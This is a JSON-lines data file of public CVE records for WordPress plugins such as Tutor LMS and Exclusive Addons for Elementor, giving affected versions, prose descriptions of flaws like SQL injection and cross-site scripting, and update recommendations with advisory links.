{"CVE_ID":"CVE-2024-4279","slug":"tutor","versionImpact":"2.7.0","versionEndExcluding":"2.7.1","description":"The Tutor LMS \u2013 eLearning and online course solution plugin for WordPress is vulnerable to Insecure Direct Object Reference to Arbitrary Course Deletion in versions up to, and including, 2.7.0 via the 'tutor_course_delete' function due to missing validation on a user controlled key. This can allow authenticated attackers, with Instructor-level permissions and above, to delete any course.","recommendation":"Update to version 2.7.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/45d04643-e43a-4732-91bf-e4af7b622e33?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/45d04643-e43a-4732-91bf-e4af7b622e33?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tutor\\\/trunk\\\/classes\\\/Course_List.php#L357\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tutor\\\/trunk\\\/classes\\\/Course_List.php#L357\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3086489\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3086489\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4352","slug":"tutor-pro","versionImpact":"2.7.0","versionEndExcluding":"2.7.1","description":"The Tutor LMS Pro plugin for WordPress is vulnerable to unauthorized access of data, modification of data, loss of data due to a missing capability check on the 'get_calendar_materials' function. The plugin is also vulnerable to SQL Injection via the \u2018year\u2019 parameter of that function due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with subscriber-level permissions and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.7.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c647beda-cf73-4372-975f-a8c8ed05217f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c647beda-cf73-4372-975f-a8c8ed05217f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.themeum.com\\\/product\\\/tutor-lms\\\/\",\"name\":\"https:\\\/\\\/www.themeum.com\\\/product\\\/tutor-lms\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4351","slug":"tutor-pro","versionImpact":"2.7.0","versionEndExcluding":"2.7.1","description":"The Tutor LMS Pro plugin for WordPress is vulnerable to unauthorized access of data, modification of data, loss of data due to a missing capability check on the 'authenticate' function in all versions up to, and including, 2.7.0. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to gain control of an existing administrator account.","recommendation":"Update to version 2.7.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/59859583-49e5-4a80-8659-b9ca7ddc089d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/59859583-49e5-4a80-8659-b9ca7ddc089d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.themeum.com\\\/product\\\/tutor-lms\\\/\",\"name\":\"https:\\\/\\\/www.themeum.com\\\/product\\\/tutor-lms\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4222","slug":"tutor-pro","versionImpact":"2.7.0","versionEndExcluding":"2.7.1","description":"The Tutor LMS Pro plugin for WordPress is vulnerable to unauthorized access of data, modification of data, loss of data due to a missing capability check on multiple functions in all versions up to, and including, 2.7.0. This makes it possible for unauthenticated attackers to add, modify, or delete user meta and plugin options.","recommendation":"Update to version 2.7.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/942fffb6-2719-4b70-9759-21b2d50002c5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/942fffb6-2719-4b70-9759-21b2d50002c5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.themeum.com\\\/product\\\/tutor-lms\\\/\",\"name\":\"https:\\\/\\\/www.themeum.com\\\/product\\\/tutor-lms\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5607","slug":"ninja-gdpr-compliance","versionImpact":"2.7.0","versionEndExcluding":"2.7.1","description":"The GDPR CCPA Compliance & Cookie Consent Banner plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on several functions named ajaxUpdateSettings() in all versions up to, and including, 2.7.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify the plugin's settings, update page content, send arbitrary emails and inject malicious web scripts.","recommendation":"Update to version 2.7.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b8f870a6-26a5-4f98-9bd6-12736c561265?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b8f870a6-26a5-4f98-9bd6-12736c561265?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3097680%40ninja-gdpr-compliance&new=3097680%40ninja-gdpr-compliance&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3097680%40ninja-gdpr-compliance&new=3097680%40ninja-gdpr-compliance&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5958","slug":"post-smtp","versionImpact":"2.7.0","versionEndExcluding":"2.7.1","description":"The POST SMTP Mailer WordPress plugin before 2.7.1 does not escape email message content before displaying it in the backend, allowing an unauthenticated attacker to perform XSS attacks against highly privileged users.","recommendation":"Update to version 2.7.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/22fa478d-e42e-488d-9b4b-a8720dec7cee\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/22fa478d-e42e-488d-9b4b-a8720dec7cee\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5604","slug":"asgaros-forum","versionEndExcluding":"2.7.1","description":"The Asgaros Forum WordPress plugin before 2.7.1 allows forum administrators, who may not be WordPress (super-)administrators, to set insecure configuration that allows unauthenticated users to upload dangerous files (e.g. .php, .phtml), potentially leading to remote code execution.","recommendation":"Update to version 2.7.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4ce69d71-87bf-4d95-90f2-63d558c78b69\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4ce69d71-87bf-4d95-90f2-63d558c78b69\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3553","slug":"tutor","versionImpact":"2.6.2","versionEndExcluding":"2.7.0","description":"The Tutor LMS \u2013 eLearning and online course solution plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the hide_notices function in all versions up to, and including, 2.6.2. This makes it possible for unauthenticated attackers to enable user registration on sites that may have it disabled.","recommendation":"Update to version 2.7.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f8d4029e-07b0-4ceb-ae6e-11a3f7416ebc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f8d4029e-07b0-4ceb-ae6e-11a3f7416ebc?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3076302\\\/tutor\\\/tags\\\/2.7.0\\\/classes\\\/User.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3076302\\\/tutor\\\/tags\\\/2.7.0\\\/classes\\\/User.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13611","slug":"bp-better-messages","versionImpact":"2.6.9","versionEndExcluding":"2.7.0","description":"The Better Messages \u2013 Live Chat for WordPress, BuddyPress, PeepSo, Ultimate Member, BuddyBoss plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.6.9 via the 'bp-better-messages' directory. This makes it possible for unauthenticated attackers to extract sensitive data stored insecurely in the \/wp-content\/uploads\/bp-better-messages directory which can contain file attachments included in chat messages.","recommendation":"Update to version 2.7.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bp-better-messages\\\/trunk\\\/addons\\\/files.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bp-better-messages\\\/trunk\\\/addons\\\/files.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3228957\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3228957\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/997918b9-2ccd-413e-9df2-d24bc3820ba1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/997918b9-2ccd-413e-9df2-d24bc3820ba1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13612","slug":"bp-better-messages","versionImpact":"2.6.9","versionEndExcluding":"2.7.0","description":"The Better Messages \u2013 Live Chat for WordPress, BuddyPress, PeepSo, Ultimate Member, BuddyBoss plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'better_messages_live_chat_button' shortcode in all versions up to, and including, 2.6.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.7.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bp-better-messages\\\/trunk\\\/inc\\\/shortcodes.php#L125\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bp-better-messages\\\/trunk\\\/inc\\\/shortcodes.php#L125\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bp-better-messages\\\/trunk\\\/inc\\\/shortcodes.php#L127\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bp-better-messages\\\/trunk\\\/inc\\\/shortcodes.php#L127\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bp-better-messages\\\/trunk\\\/inc\\\/shortcodes.php#L84\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bp-better-messages\\\/trunk\\\/inc\\\/shortcodes.php#L84\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3228965\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3228965\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/169a857f-1ae0-40f6-8a34-10c573af59c5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/169a857f-1ae0-40f6-8a34-10c573af59c5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8873","slug":"pepro-bacs-receipt-upload-for-woocommerce","versionImpact":"2.6.9","versionEndExcluding":"2.7.0","description":"The PeproDev WooCommerce Receipt Uploader plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.6.9. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.7.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e09c2916-6e2c-4db3-901a-b5715d635824?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e09c2916-6e2c-4db3-901a-b5715d635824?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pepro-bacs-receipt-upload-for-woocommerce\\\/trunk\\\/wc-upload-reciept.php#L163\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pepro-bacs-receipt-upload-for-woocommerce\\\/trunk\\\/wc-upload-reciept.php#L163\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13660","slug":"mobile-friendly-flickr-slideshow","versionImpact":"2.6.1","versionEndExcluding":"2.7.0","description":"The Responsive Flickr Slideshow plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'fshow' shortcode in all versions up to, and including, 2.6.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.7.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mobile-friendly-flickr-slideshow\\\/tags\\\/2.6.1\\\/mobile-friendly-flickr-slideshow.php#L191\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mobile-friendly-flickr-slideshow\\\/tags\\\/2.6.1\\\/mobile-friendly-flickr-slideshow.php#L191\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8023be86-2bdb-4f16-9b54-a959f1e75e46?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8023be86-2bdb-4f16-9b54-a959f1e75e46?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11898","slug":"scratch-win-giveaways-for-website-facebook","versionImpact":"2.6.9","versionEndExcluding":"2.7.0","description":"The Scratch & Win \u2013 Giveaways and Contests. Boost subscribers, traffic, repeat visits,  referrals, sales and more plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'swin-campaign' shortcode in all versions up to, and including, 2.6.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.7.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/scratch-win-giveaways-for-website-facebook\\\/tags\\\/2.6.9\\\/socialscratchwin.php#L155\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/scratch-win-giveaways-for-website-facebook\\\/tags\\\/2.6.9\\\/socialscratchwin.php#L155\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3199234%40scratch-win-giveaways-for-website-facebook&new=3199234%40scratch-win-giveaways-for-website-facebook&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3199234%40scratch-win-giveaways-for-website-facebook&new=3199234%40scratch-win-giveaways-for-website-facebook&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5b7f3f0f-5f02-41d7-ac37-ecdde74fc532?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5b7f3f0f-5f02-41d7-ac37-ecdde74fc532?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5666","slug":"accordions-wp","versionImpact":"2.6","versionEndExcluding":"2.7","description":"The Accordion plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'tcpaccordion' shortcode in all versions up to, and including, 2.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2982015\\\/accordions-wp#file370\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2982015\\\/accordions-wp#file370\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a8ada876-4a8b-494f-9132-d88a71b42c44?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a8ada876-4a8b-494f-9132-d88a71b42c44?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/accordions-wp\\\/trunk\\\/theme\\\/custom-wp-accordion-themes.php?rev=2406278#L24\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/accordions-wp\\\/trunk\\\/theme\\\/custom-wp-accordion-themes.php?rev=2406278#L24\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1597","slug":"td-cloud-library","versionEndExcluding":"2.7","description":"The tagDiv Cloud Library WordPress plugin before 2.7 does not have authorisation and CSRF in an AJAX action accessible to both unauthenticated and authenticated users, allowing unauthenticated users to change arbitrary user metadata, which could lead to privilege escalation by setting themselves as an admin of the blog.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4eafe111-8874-4560-83ff-394abe7a803b\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4eafe111-8874-4560-83ff-394abe7a803b\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3721","slug":"wp-email","versionEndExcluding":"2.69.1","description":"The WP-EMail WordPress plugin before 2.69.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3f90347a-6586-4648-9f2c-d4f321bf801a\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3f90347a-6586-4648-9f2c-d4f321bf801a\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5332","slug":"exclusive-addons-for-elementor","versionImpact":"2.6.9.8","versionEndExcluding":"2.6.9.9","description":"The Exclusive Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Card widget in all versions up to, and including, 2.6.9.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.6.9.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a8c547cc-2820-4138-b042-a0ec2e7f2fca?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a8c547cc-2820-4138-b042-a0ec2e7f2fca?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3103786\\\/exclusive-addons-for-elementor\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3103786\\\/exclusive-addons-for-elementor\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3985","slug":"exclusive-addons-for-elementor","versionImpact":"2.6.9.4","versionEndExcluding":"2.6.9.5","description":"The Exclusive Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Call to Action widget in all versions up to, and including, 2.6.9.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.6.9.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/206c5736-d9d9-4029-afdf-d76251cc81ac?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/206c5736-d9d9-4029-afdf-d76251cc81ac?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3074085\\\/exclusive-addons-for-elementor\\\/trunk\\\/elements\\\/call-to-action\\\/call-to-action.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3074085\\\/exclusive-addons-for-elementor\\\/trunk\\\/elements\\\/call-to-action\\\/call-to-action.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3489","slug":"exclusive-addons-for-elementor","versionImpact":"2.6.9.4","versionEndExcluding":"2.6.9.5","description":"The Exclusive Addons for Elementor plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the Countdown Expired Title in all versions up to, and including, 2.6.9.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.6.9.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/76b987f1-2524-498a-a02c-a3ca390026e1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/76b987f1-2524-498a-a02c-a3ca390026e1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3074085\\\/exclusive-addons-for-elementor\\\/trunk\\\/elements\\\/countdown-timer\\\/countdown-timer.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3074085\\\/exclusive-addons-for-elementor\\\/trunk\\\/elements\\\/countdown-timer\\\/countdown-timer.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2750","slug":"exclusive-addons-for-elementor","versionImpact":"2.6.9.3","versionEndExcluding":"2.6.9.4","description":"The Exclusive Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the URL attribute of the Button widget in all versions up to, and including, 2.6.9.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.6.9.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3011b783-e4b4-45d2-81af-2f8d166a30ac?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3011b783-e4b4-45d2-81af-2f8d166a30ac?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3072751\\\/exclusive-addons-for-elementor\\\/trunk\\\/elements\\\/button\\\/button.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3072751\\\/exclusive-addons-for-elementor\\\/trunk\\\/elements\\\/button\\\/button.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2751","slug":"exclusive-addons-for-elementor","versionImpact":"2.6.9.2","versionEndExcluding":"2.6.9.3","description":"The Exclusive Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018exad_infobox_animating_mask_style\u2019 parameter in all versions up to, and including, 2.6.9.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.6.9.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e9ad2dff-0c6d-4d91-a35d-803b97def01f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e9ad2dff-0c6d-4d91-a35d-803b97def01f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3065677%40exclusive-addons-for-elementor%2Ftrunk&old=3051927%40exclusive-addons-for-elementor%2Ftrunk&sfp_email=&sfph_mail=#file51\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3065677%40exclusive-addons-for-elementor%2Ftrunk&old=3051927%40exclusive-addons-for-elementor%2Ftrunk&sfp_email=&sfph_mail=#file51\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2503","slug":"exclusive-addons-for-elementor","versionImpact":"2.6.9.2","versionEndExcluding":"2.6.9.3","description":"The Exclusive Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Post Grid Widget in all versions up to, and including, 2.6.9.2 due to insufficient input sanitization and output escaping on user supplied tags. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. CVE-2024-32557 is likely a duplicate of this issue.","recommendation":"Update to version 2.6.9.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2bd53172-ddfa-481a-818d-626b9db6fe41?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2bd53172-ddfa-481a-818d-626b9db6fe41?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/exclusive-addons-for-elementor\\\/tags\\\/2.6.9.1\\\/includes\\\/template-parts\\\/tmpl-post-grid.php#L103\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/exclusive-addons-for-elementor\\\/tags\\\/2.6.9.1\\\/includes\\\/template-parts\\\/tmpl-post-grid.php#L103\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3065677%40exclusive-addons-for-elementor%2Ftrunk&old=3051927%40exclusive-addons-for-elementor%2Ftrunk&sfp_email=&sfph_mail=#file51\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3065677%40exclusive-addons-for-elementor%2Ftrunk&old=3051927%40exclusive-addons-for-elementor%2Ftrunk&sfp_email=&sfph_mail=#file51\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2028","slug":"exclusive-addons-for-elementor","versionImpact":"2.6.9","versionEndExcluding":"2.6.9.1","description":"The Exclusive Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Covid-19 Stats Widget in all versions up to, and including, 2.6.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.6.9.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d44ecf8a-d19a-403a-96c7-89e223a5cc22?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d44ecf8a-d19a-403a-96c7-89e223a5cc22?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3042217\\\/exclusive-addons-for-elementor\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3042217\\\/exclusive-addons-for-elementor\",\"refsource\":\"\",\"tags\":[]}]"}
